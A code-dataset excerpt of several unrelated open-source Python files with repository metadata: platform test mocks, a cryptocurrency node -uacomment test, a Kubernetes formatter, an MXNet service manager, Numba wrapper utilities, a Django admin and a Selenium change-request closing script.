#samples1 and samples2 have shape (# of dims, # of samples). prior1_mean and prior2_mean have shape (#dim,1) and prior1_cov and prior2_cov have shape (#dim,#dim)
Delta = samples1-samples2
density = scipy.stats.kde.gaussian_kde(Delta,bw_method='scott')
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(Delta.shape[0]),mean=prior1_mean-prior2_mean,cov=prior1_cov+prior2_cov)
denominator = density.evaluate(numpy.zeros(Delta.shape[0]))
return numerator/denominator, numerator, denominator
| 48.108696
| 165
| 0.779485
|
e75126644b521a53b69326369c1ecb2a487269f7
| 1,698
|
py
|
Python
|
tests/test_utils/platform_config.py
|
gyshi/intel-models
|
4ead44aa254a84109ac8019f5d386e3adb75ac26
|
[
"Apache-2.0"
] | 1
|
2019-09-11T21:41:36.000Z
|
2019-09-11T21:41:36.000Z
|
tests/test_utils/platform_config.py
|
gyshi/intel-models
|
4ead44aa254a84109ac8019f5d386e3adb75ac26
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils/platform_config.py
|
gyshi/intel-models
|
4ead44aa254a84109ac8019f5d386e3adb75ac26
|
[
"Apache-2.0"
] | 1
|
2019-09-11T21:41:51.000Z
|
2019-09-11T21:41:51.000Z
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
# Constants used for test mocks
SYSTEM_TYPE = "Linux"
LSCPU_PATH = "/usr/bin/lscpu"
LSCPU_OUTPUT = ("Architecture: x86_64\n"
"CPU(s): 112\n"
"Thread(s) per core: 2\n"
"Core(s) per socket: 28\n"
"Socket(s): 2\n"
"NUMA node(s): 2\n")
def set_mock_system_type(mock_platform):
"""
Sets the system type return value to Linux, which is currently the only
supported system type.
"""
mock_platform.system.return_value = SYSTEM_TYPE
def set_mock_os_access(mock_os):
"""
Sets the os.access return value to True
"""
mock_os.access.return_value = True
def set_mock_lscpu_subprocess_values(mock_subprocess):
"""
Sets mock return values for two subprocess calls that are made in
platform_util, which returns the lscpu path and the lscpu output.
"""
mock_subprocess.check_output.side_effect = [LSCPU_PATH,
LSCPU_OUTPUT]
| 31.444444
| 75
| 0.646643
|
bc6ea7bfcc05e7da8c0d49faf5a100f270c66cbc
| 1,531
|
py
|
Python
|
test/functional/uacomment.py
|
wolfoxonly/bwb
|
aae01441cdc171ff7bbdc161b74b4eeb2f1b5a10
|
[
"MIT"
] | null | null | null |
test/functional/uacomment.py
|
wolfoxonly/bwb
|
aae01441cdc171ff7bbdc161b74b4eeb2f1b5a10
|
[
"MIT"
] | null | null | null |
test/functional/uacomment.py
|
wolfoxonly/bwb
|
aae01441cdc171ff7bbdc161b74b4eeb2f1b5a10
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bwbcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uacomment option."""
from test_framework.test_framework import BwbcoinTestFramework
from test_framework.util import assert_equal
class UacommentTest(BwbcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test multiple -uacomment")
test_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-12:-1]
assert_equal(test_uacomment, "(testnode0)")
self.restart_node(0, ["-uacomment=foo"])
foo_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-17:-1]
assert_equal(foo_uacomment, "(testnode0; foo)")
self.log.info("test -uacomment max length")
self.stop_node(0)
expected = "Total length of network version string (286) exceeds maximum length (256). Reduce the number or size of uacomments."
self.assert_start_raises_init_error(0, ["-uacomment=" + 'a' * 256], expected)
self.log.info("test -uacomment unsafe characters")
for unsafe_char in ['/', ':', '(', ')']:
expected = "User Agent comment (" + unsafe_char + ") contains unsafe characters"
self.assert_start_raises_init_error(0, ["-uacomment=" + unsafe_char], expected)
if __name__ == '__main__':
UacommentTest().main()
| 42.527778
| 136
| 0.683867
|
bdb4e4c89709f2142cd263c8f4920c6c78de9e69
| 1,022
|
py
|
Python
|
bcs-ui/backend/resources/workloads/replicaset/formatter.py
|
kayinli/bk-bcs
|
93a0856175f7b066ef835921572c1cac590dbd8e
|
[
"Apache-2.0"
] | 1
|
2021-11-16T08:15:13.000Z
|
2021-11-16T08:15:13.000Z
|
bcs-ui/backend/resources/workloads/replicaset/formatter.py
|
kayinli/bk-bcs
|
93a0856175f7b066ef835921572c1cac590dbd8e
|
[
"Apache-2.0"
] | null | null | null |
bcs-ui/backend/resources/workloads/replicaset/formatter.py
|
kayinli/bk-bcs
|
93a0856175f7b066ef835921572c1cac590dbd8e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from typing import Dict
from backend.resources.workloads.common.formatter import WorkloadFormatter
class ReplicaSetFormatter(WorkloadFormatter):
"""ReplicaSet 格式化"""
def format_dict(self, resource_dict: Dict) -> Dict:
return self.format_common_dict(resource_dict)
| 40.88
| 115
| 0.780822
|
c216aca0723d8afa7f5e3007e3cb895fcc2dd043
| 5,464
|
py
|
Python
|
mms/service_manager.py
|
abhinavs95/mxnet-model-server
|
901c1a9a2def8373cd9a91c8d2f47248eed281cc
|
[
"Apache-2.0"
] | 1
|
2019-01-10T20:56:25.000Z
|
2019-01-10T20:56:25.000Z
|
mms/service_manager.py
|
frankfliu/mxnet-model-server
|
ce36c9e35efc17efe0fb79bb7019bdf3593131a5
|
[
"Apache-2.0"
] | null | null | null |
mms/service_manager.py
|
frankfliu/mxnet-model-server
|
ce36c9e35efc17efe0fb79bb7019bdf3593131a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
# http://www.apache.org/licenses/LICENSE-2.0
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
This module manages model-services
"""
import inspect
import mms.model_service.mxnet_model_service as mxnet_model_service
from mms.model_service.model_service import load_service
from mms.model_service.mxnet_model_service import SingleNodeService
from mms.storage import KVStorage
class ServiceManager(object):
"""ServiceManager is responsible for storing information and managing
model services. ServiceManager calls model services directly.
In later phase, ServiceManager will also be responsible for model versioning,
prediction batching and caching.
"""
def __init__(self):
"""
Initialize Service Manager.
"""
# registry for model definition and user defined functions
self.modelservice_registry = KVStorage('modelservice')
self.func_registry = KVStorage('func')
# loaded model services
self.loaded_modelservices = KVStorage('loaded_modelservices')
def get_modelservices_registry(self, modelservice_names=None):
"""
Get all registered Model Service Class Definitions in a dictionary
from internal registry according to name or list of names.
If nothing is passed, all registered model services will be returned.
Parameters
----------
modelservice_names : List, optional
Names to retrieve registered model services.
Returns
----------
Dict of name, model service pairs
Registered model services according to given names.
"""
if modelservice_names is None:
return self.modelservice_registry
return {
modelservice_name: self.modelservice_registry[modelservice_name]
for modelservice_name in modelservice_names
}
def add_modelservice_to_registry(self, modelservice_name, ModelServiceClassDef):
"""
Add a model service to internal registry.
Parameters
----------
modelservice_name : string
Model service name to be added.
ModelServiceClassDef: python class
Model Service Class Definition which can initialize a model service.
"""
self.modelservice_registry[modelservice_name] = ModelServiceClassDef
def get_loaded_modelservices(self, modelservice_names=None):
"""
Get all model services which are loaded in the system into a dictionary
according to name or list of names.
If nothing is passed, all loaded model services will be returned.
Parameters
----------
modelservice_names : List, optional
Model service names to retrieve loaded model services.
Returns
----------
Dict of name, model service pairs
Loaded model services according to given names.
"""
if modelservice_names is None:
return self.loaded_modelservices
return {
modelservice_name: self.loaded_modelservices[modelservice_name]
for modelservice_name in modelservice_names
}
def load_model(self, service_name, model_name, model_path, manifest, ModelServiceClassDef, gpu=None):
"""
Load a single model into a model service by using
user passed Model Service Class Definitions.
Parameters
----------
service_name : string
Service name
model_name : string
Model name
model_path: stirng
Model path which can be url or local file path.
manifest: string
Model manifest
ModelServiceClassDef: python class
Model Service Class Definition which can initialize a model service.
gpu : int
Id of gpu device. If machine has two gpus, this number can be 0 or 1.
If it is not set, cpu will be used.
"""
self.loaded_modelservices[service_name] = ModelServiceClassDef(model_name, model_path, manifest, gpu)
def parse_modelservices_from_module(self, service_file):
"""
Parse user defined module to get all model service classe in it.
Parameters
----------
service_file : User defined module file path
A python module which will be parsed by given name.
Returns
----------
List of model service class definitions.
Those parsed python class can be used to initialize model service.
"""
module = load_service(service_file) if service_file else mxnet_model_service
# Parsing the module to get all defined classes
classes = [cls[1] for cls in inspect.getmembers(module, inspect.isclass)]
# Check if class is subclass of base ModelService class
# pylint: disable=deprecated-lambda
return list(filter(lambda cls: issubclass(cls, SingleNodeService), classes))
| 37.682759
| 109
| 0.66929
|
e99018f7dadaf760a95e8a24fec67c5bd58d11ef
| 12,338
|
py
|
Python
|
python/katana/native_interfacing/wrappers.py
|
origandrew/katana
|
456d64cf48a9d474dc35fb17e4d841bfa7a2f383
|
[
"BSD-3-Clause"
] | null | null | null |
python/katana/native_interfacing/wrappers.py
|
origandrew/katana
|
456d64cf48a9d474dc35fb17e4d841bfa7a2f383
|
[
"BSD-3-Clause"
] | null | null | null |
python/katana/native_interfacing/wrappers.py
|
origandrew/katana
|
456d64cf48a9d474dc35fb17e4d841bfa7a2f383
|
[
"BSD-3-Clause"
] | 1
|
2021-08-18T08:46:05.000Z
|
2021-08-18T08:46:05.000Z
|
import ctypes
import logging
from abc import ABCMeta, abstractmethod
from functools import lru_cache
from typing import Optional, Sequence, Union
import numba.core.ccallback
import numba.types
import numpy as np
from llvmlite import ir
from numba import from_dtype
from numba.core import cgutils, imputils
from numba.core.base import BaseContext
from numba.extending import (
NativeValue,
get_cython_function_address,
lower_builtin,
make_attribute_wrapper,
models,
overload_method,
register_model,
type_callable,
typeof_impl,
unbox,
)
from katana.native_interfacing.template_type import find_size_for_dtype
from . import exec_in_file, wraps_class
_logger = logging.getLogger(__name__)
def get_cython_function_address_with_defaults(full_function_name, default_module_name, default_function_name):
module_name = None
function_name = None
if full_function_name:
i = full_function_name.rfind(".")
if i >= 0:
module_name = full_function_name[:i]
function_name = full_function_name[i + 1 :]
else:
function_name = full_function_name
return get_cython_function_address(module_name or default_module_name, function_name or default_function_name)
class NumbaPointerWrapper(metaclass=ABCMeta):
"""
A collection of methods to configure Numba to correctly handle an extension type that can provide a raw pointer
to some underlying native object.
This class is used from Numba wrappers in pybind11 and Cython.
"""
def __init__(self, orig_typ, override_module_name=None):
_logger.debug("NumbaPointerWrapper: %r, %r", orig_typ, override_module_name)
Type = self._build_typing(orig_typ)
self._build_model(Type)
self.Type = Type
self.type_name = orig_typ.__name__
self.module_name = orig_typ.__module__
self.override_module_name = override_module_name or self.module_name
self.orig_type = orig_typ
def _build_model(self, Type):
# pylint: disable=unused-variable
@register_model(Type)
class Model(models.StructModel):
def __init__(self, dmm, fe_type):
members = [("ptr", numba.types.voidptr)]
models.StructModel.__init__(self, dmm, fe_type, members)
make_attribute_wrapper(Type, "ptr", "ptr")
@imputils.lower_constant(Type)
def constant(context, builder, ty, pyval):
# pylint: disable=unused-argument
ptr = ir.Constant(ir.IntType(64), self.get_value_address(pyval)).inttoptr(ir.PointerType(ir.IntType(8)))
ret = ir.Constant.literal_struct((ptr,))
return ret
def _build_typing(self, orig_typ):
@wraps_class(orig_typ, "<numba type>")
class Type(numba.types.Type):
def __init__(self):
super().__init__(name=orig_typ.__name__)
@typeof_impl.register(orig_typ)
def typeof(val, c):
# pylint: disable=unused-argument
return Type()
return Type
def register_method(
self,
func_name: str,
typ,
cython_func_name: Optional[str] = None,
addr: Optional[int] = None,
dtype_arguments: Optional[Sequence[bool]] = None,
data: Optional[int] = None,
):
"""
Add a Numba callable Method to the type represented by self.
This is called from `katana.native_interfacing.numba_support.register_method`.
:param func_name: The name of the method.
:param typ: The type of the method, with :py:data:`~ctypes.c_void_p` used for object pointers.
:type typ: `ctypes` type
:param cython_func_name: Deprecated. Used for Cython sanity checks.
:param addr: The address of the function implementing the method. It must have a type matching ``typ``.
:param dtype_arguments: A sequence of `bool` specifying if each argument's type is defined by the dtype
associated with the runtime value.
:param data: An opaque value passed to the implementation (``addr``) as the first argument.
"""
addr_found = None
if cython_func_name:
addr_found = get_cython_function_address_with_defaults(
cython_func_name, self.override_module_name, self.type_name + "_" + func_name,
)
if addr and addr_found:
assert addr == addr_found
func = typ(addr or addr_found)
if dtype_arguments is None:
dtype_arguments = [False] * (len(func.argtypes) - 1 - (1 if data is not None else 0))
_logger.debug(
"%r.register_method: %r, %r: %r%r, %x, %r",
self,
func_name,
func,
func.restype,
func.argtypes,
addr_found,
cython_func_name,
)
exec_glbls = dict(
self=self,
func_name=func_name,
func=func,
overload_method=overload_method,
construct_dtype_on_stack=construct_dtype_on_stack,
)
arguments = ", ".join(f"arg{i}" for i, _ in enumerate(dtype_arguments))
arguments_construct = ", ".join(
f"construct_dtype_on_stack(self, arg{i})" if is_dtype else f"arg{i}"
for i, is_dtype in enumerate(dtype_arguments)
)
src = f"""
@overload_method(self.Type, func_name)
def overload(self, {arguments}):
def impl(self, {arguments}):
return func({data}, self.ptr, {arguments_construct})
return impl
"""
if data is None:
src = f"""
@overload_method(self.Type, func_name)
def overload(self, {arguments}):
def impl(self, {arguments}):
return func(self.ptr, {arguments_construct})
return impl
"""
exec_in_file(f"{self.type_name}_{id(self)}_overload_{func_name}", src, exec_glbls)
return exec_glbls["overload"]
@abstractmethod
def get_value_address(self, pyval):
raise NotImplementedError()
def __repr__(self):
return "<{} {} {}>".format(type(self).__name__, self.orig_type, self.Type)
class SimpleNumbaPointerWrapper(NumbaPointerWrapper):
def __init__(self, orig_typ, override_module_name=None):
assert (
hasattr(orig_typ, "__katana_address__")
and hasattr(orig_typ.__katana_address__, "__get__")
and not hasattr(orig_typ.__katana_address__, "__call__")
), "{}.__katana_address__ does not exist or is not a property.".format(orig_typ)
super().__init__(orig_typ, override_module_name)
@unbox(self.Type)
def unbox_func(typ, obj, c):
ptr_obj = c.pyapi.object_getattr_string(obj, "__katana_address__")
ctx = cgutils.create_struct_proxy(typ)(c.context, c.builder)
ctx.ptr = c.pyapi.long_as_voidptr(ptr_obj)
c.pyapi.decref(ptr_obj)
is_error = cgutils.is_not_null(c.builder, c.pyapi.err_occurred())
return NativeValue(ctx._getvalue(), is_error=is_error)
def get_value_address(self, pyval):
return pyval.__katana_address__
class DtypeParametricType(numba.types.Type):
def __init__(self, name, dtype):
super().__init__(name=name)
if not isinstance(dtype, np.dtype):
raise TypeError("dtype must be a dtype: " + str(dtype))
self.dtype = dtype
@property
def key(self):
return self.name, self.dtype
@property
def mangling_args(self):
typ = self.dtype_as_type()
if isinstance(typ, numba.types.Record):
return self.name, tuple(t for _, t in typ.members)
return self.name, (typ,)
@lru_cache(1)
def dtype_as_type(self) -> Union[numba.types.Record, numba.types.Type]:
return from_dtype(self.dtype)
class DtypeNumbaPointerWrapper(SimpleNumbaPointerWrapper):
def __init__(self, orig_typ, override_module_name=None):
super().__init__(orig_typ, override_module_name)
# TODO: Is there a way to check for ".dtype"? Probably not, it's an attribute and we don't have an instance.
def _build_typing(self, orig_typ):
@wraps_class(orig_typ, "<numba type>")
class Type(DtypeParametricType):
def __init__(self, dtype):
super().__init__(dtype=dtype, name=orig_typ.__name__)
@typeof_impl.register(orig_typ)
def typeof_func(val, c):
_ = c
return Type(val.dtype)
return Type
class NativeNumbaPointerWrapper(NumbaPointerWrapper):
def __init__(self, orig_typ, addr_func, addr_func_name=None, override_module_name=None):
super().__init__(orig_typ, override_module_name)
self.addr_func = self._build_unbox_by_call(addr_func, addr_func_name)
def _build_unbox_by_call(self, addr_func, addr_func_name):
try:
addr_func_c = get_cython_function_address_with_defaults(
addr_func_name, self.override_module_name, self.type_name + "_get_address",
)
except ValueError:
addr_func_c = get_cython_function_address_with_defaults(
addr_func_name, self.override_module_name, self.type_name + "_get_address_c",
)
@unbox(self.Type)
def unbox_type(typ, obj, c):
ctx = cgutils.create_struct_proxy(typ)(c.context, c.builder)
ctx.ptr = call_raw_function_pointer(
addr_func_c,
ir.FunctionType(ir.PointerType(ir.IntType(8)), (ir.PointerType(ir.IntType(8)),)),
(obj,),
c.builder,
)
return NativeValue(ctx._getvalue())
return addr_func
def get_value_address(self, pyval):
return self.addr_func(pyval)
def construct_dtype_on_stack(self, values):
"""
(Numba compiled only) Return a stack allocated instance of the self.dtype (self must be a DtypeParametricType) with
the field values taken from the tuple `values`.
"""
raise RuntimeError("Not callable from Python")
@type_callable(construct_dtype_on_stack)
def type_construct_dtype_on_stack(context):
# pylint: disable=unused-argument
def typer(self, values):
if isinstance(self, DtypeParametricType) and isinstance(values, numba.types.BaseTuple):
return numba.types.voidptr
return None
return typer
@lower_builtin(construct_dtype_on_stack, DtypeParametricType, numba.types.BaseTuple)
def impl_construct_dtype_on_stack(context: BaseContext, builder: ir.IRBuilder, sig, args):
ty = sig.args[0].dtype_as_type()
containing_size = find_size_for_dtype(sig.args[0].dtype)
ptr = builder.alloca(ir.IntType(8), containing_size)
for i, (name, mem_ty) in enumerate(ty.members):
llvm_mem_ty = context.get_value_type(mem_ty)
offset = ty.offset(name)
v = builder.extract_value(args[1], i)
v = context.cast(builder, v, sig.args[1][i], mem_ty)
v_ptr_byte = builder.gep(ptr, (ir.Constant(ir.IntType(32), offset),), True)
v_ptr = builder.bitcast(v_ptr_byte, llvm_mem_ty.as_pointer())
builder.store(v, v_ptr)
return ptr
def call_raw_function_pointer(func_ptr, function_type, args, builder: ir.IRBuilder):
val = ir.Constant(ir.IntType(64), func_ptr)
ptr = builder.inttoptr(val, ir.PointerType(function_type))
# Due to limitations in llvmlite ptr cannot be a constant, so do the cast as an instruction to make the call
# argument an instruction.
return builder.call(ptr, args)
def interpret_numba_wrapper_tables(tables, global_vars=None, override_module_name=None):
for typ, with_dtype, table in tables:
if with_dtype:
Type = DtypeNumbaPointerWrapper(typ, override_module_name=override_module_name)
else:
Type = SimpleNumbaPointerWrapper(typ, override_module_name=override_module_name)
interpret_numba_wrapper_table(Type, table)
if global_vars:
global_vars[typ.__name__ + "_numba_wrapper"] = Type
global_vars[typ.__name__ + "_numba_type"] = Type.Type
def interpret_numba_wrapper_table(Type, table):
for name, func_type, impl_func_name, addr, dtype_arguments in table:
Type.register_method(name, func_type, impl_func_name, addr=addr, dtype_arguments=dtype_arguments)
| 36.94012
| 119
| 0.66437
|
6f1d734696420c0e7e42d7ff50942a6eaf14fe3a
| 777
|
py
|
Python
|
app/core_app/admin.py
|
ruhankhandakar/recipe-app-api
|
55eb2109b0e91d6bb193a1745ea6cdde3ac43e01
|
[
"MIT"
] | null | null | null |
app/core_app/admin.py
|
ruhankhandakar/recipe-app-api
|
55eb2109b0e91d6bb193a1745ea6cdde3ac43e01
|
[
"MIT"
] | null | null | null |
app/core_app/admin.py
|
ruhankhandakar/recipe-app-api
|
55eb2109b0e91d6bb193a1745ea6cdde3ac43e01
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.utils.translation import gettext as _
from .models import User
# Register your models here.
class UserAdmin(BaseUserAdmin):
ordering = ['id']
list_display = ['email', 'name']
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Personal Info'), {'fields': ('name',)}),
(
_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}
),
(_('Important dates'), {'fields': ('last_login',)})
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2')
}),
)
admin.site.register(User, UserAdmin)
| 26.793103
| 83
| 0.574003
|
2084bc1be844798ed223843e0f82bbaa2ed7ff69
| 6,461
|
py
|
Python
|
combiners/close.py
|
masudul-hasan/autobot
|
2fbbb954b6583a44935f303e042dd5cf1b349cc7
|
[
"MIT"
] | null | null | null |
combiners/close.py
|
masudul-hasan/autobot
|
2fbbb954b6583a44935f303e042dd5cf1b349cc7
|
[
"MIT"
] | null | null | null |
combiners/close.py
|
masudul-hasan/autobot
|
2fbbb954b6583a44935f303e042dd5cf1b349cc7
|
[
"MIT"
] | null | null | null |
from rich.live import Live
from selenium.webdriver.chrome.webdriver import WebDriver
from pages.base import BasePage
from pages.closerequest import CloseRequests
from pages.createrequest import CreateRequests
from pages.home import HomePage
from pages.login import LoginPage
from prettify.close_prettifier import ClosePrettify
from utilites import make_data
from utilites.static_data import StaticData
class Close(BasePage):
def __init__(self, driver: WebDriver):
""" Close NCR E2E Actions """
super().__init__(driver)
self.login_page = LoginPage(self._driver)
self.home_page = HomePage(self._driver)
self.close_requests = CloseRequests(self._driver)
self.create_requests = CreateRequests(self.close_requests._driver)
def closeRequest(self):
# Login to the Page
self.login_page.enter_username_textbox()
self.login_page.enter_password_textbox()
self.login_page.click_login_button()
# Parse all the change number from home page
all_changes_list = self.home_page.get_all_change_numbers()
# Parse all the closing change request shared by user
user_list_for_close = make_data.list_of_change(StaticData.CLOSE_CHANGE_TXT_FILE_PATH)
tasks = len(user_list_for_close)
ClosePrettify.make_layout()
ClosePrettify.make_table()
my_progress = ClosePrettify.progress_bar(tasks)
ClosePrettify.merge_layout(my_progress, ClosePrettify.get_table())
# Iterate through each user shared Change Number
with Live(ClosePrettify.get_layout(), refresh_per_second=5, vertical_overflow="visible") as live:
for job in my_progress.tasks:
for _index, a_change in enumerate(user_list_for_close):
if a_change in all_changes_list:
# get the Index number for the change calculated by algorithm get_index_for_change()
index = self.close_requests.get_index_for_change_number(a_change, all_changes_list)
if index is not None:
# Select the change request shared by user
self.close_requests.find_the_change_request(a_change, index)
if not self.close_requests.is_change_status_closed():
# check if Change is opened
if not self.close_requests.is_status_scheduled_for_approval():
# check if Change is Scheduled for approval
actual_open_time = self.close_requests.get_actual_start_date()
if actual_open_time is not None:
# make closing time depending on Actual Open Time
# actual_closing_time = make_data.make_downtime_from_open_time(
# actual_open_time)
# Grab the current sys time
current_sys_time = make_data.get_current_system_time()
self.close_requests.goto_task_page()
# Close the 2nd task
self.close_requests.close_service_downtime_duration_task(actual_open_time)
# Close the 3rd task
self.close_requests.close_service_downtime_window_task(actual_open_time,
current_sys_time)
# Close the 4th task
self.close_requests.close_system_downtime_duration_task(actual_open_time)
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(str(_index + 1),
self.close_requests.get_change_number(),
"[green]SUCCESS")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(),
"[red]NCR NOT OPENED")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]SFA")
live.update(ClosePrettify.get_layout())
else:
self.create_requests.go_back_to_homepage()
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]AC")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]INVALID")
live.update(ClosePrettify.get_layout())
else:
self.close_requests.add_change_to_invalid_list(a_change)
ClosePrettify.add_row_table(
str(_index + 1), self.close_requests.get_change_number(), "[red]INVALID")
live.update(ClosePrettify.get_layout())
if not job.finished:
my_progress.advance(job.id)
self.home_page.click_logout_button()
| 62.125
| 114
| 0.532271
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.